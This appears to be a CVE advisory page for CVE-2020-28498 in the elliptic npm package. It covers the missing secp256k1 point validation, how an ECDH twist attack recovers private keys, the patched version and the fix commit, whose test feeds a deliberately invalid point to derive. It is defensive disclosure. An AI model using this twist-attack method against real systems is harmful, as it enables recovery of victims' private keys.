Cryptographic Issues
Description
The package elliptic before 6.5.4 are vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The elliptic package before 6.5.4 fails to validate public key points on the secp256k1 curve, allowing ECDH twist attacks that may leak the private key.
Vulnerability
Overview
The elliptic npm package, versions prior to 6.5.4, contains a cryptographic flaw in its ECDH implementation for the secp256k1 curve. In elliptic/ec/key.js, the derive function accepts a public key point without first verifying that the point actually lies on the curve. This omission means an attacker can supply an invalid point (i.e., one that belongs to a different curve, known as a twist) [1][2].
Attack
Vector and Requirements
To exploit this vulnerability, an attacker must be able to provide a crafted public key to a victim's ECDH operation. No special authentication or network position is required beyond the ability to substitute a public key during a key exchange or a similar protocol step. The lack of validation allows the use of a point from the quadratic twist of the secp256k1 curve [3][4].
Impact
If an attacker repeatedly supplies such invalid points, and the victim performs several ECDH derivations with them, the victim's private key can be recovered. This is a classic twist attack on elliptic curve Diffie-Hellman, enabling the attacker to compromise the confidentiality of all past and future communications protected by that key [1][2][3].
Mitigation
Users should upgrade the elliptic package to version 6.5.4 or later. The fix was introduced in commit 441b7428, which adds a validation check in the derive function: it now asserts that the public key point is valid before performing the multiplication [4]. No workaround is recommended; upgrading is the only reliable remediation.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
ellipticnpm | < 6.5.4 | 6.5.4 |
Affected products
2- elliptic/ellipticdescription
Patches
1441b7428b0e8ec: validate that a point before deriving keys
2 files changed · +17 −0
lib/elliptic/ec/key.js+3 −0 modified@@ -100,6 +100,9 @@ KeyPair.prototype._importPublic = function _importPublic(key, enc) { // ECDH KeyPair.prototype.derive = function derive(pub) { + if(!pub.validate()) { + assert(pub.validate(), 'public point not validated'); + } return pub.mul(this.priv).getX(); };
test/ecdh-test.js+14 −0 modified@@ -27,3 +27,17 @@ describe('ECDH', function() { test('ed25519'); test('secp256k1'); }); + +describe('ECDH twist attack', () => { + it('should be able to prevent a twist attack for secp256k1', () => { + var bobEcdh = new elliptic.ec('secp256k1'); + var malloryEcdh = new elliptic.ec('secp256k1'); + var bob = bobEcdh.genKeyPair(); + // This is a bad point that shouldn't be able to be passed to derive. + // If a bad point can be passed it's possible to perform a twist attack. + var mallory = malloryEcdh.keyFromPublic({ x: 14, y: 16 }); + assert.throws(function () { + bob.derive(mallory.getPublic()); + }); + }); +});
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
8- github.com/advisories/GHSA-r9p9-mrjm-926wghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2020-28498ghsaADVISORY
- github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.mdghsax_refsource_CONFIRMWEB
- github.com/indutny/elliptic/commit/441b7428b0e8f6636c42118ad2aaa186d3c34c3fghsax_refsource_CONFIRMWEB
- github.com/indutny/elliptic/pull/244/commitsghsaWEB
- snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1069836ghsax_refsource_CONFIRMWEB
- snyk.io/vuln/SNYK-JS-ELLIPTIC-1064899ghsax_refsource_CONFIRMWEB
- www.npmjs.com/package/ellipticghsaWEB
News mentions
0No linked articles in our index yet.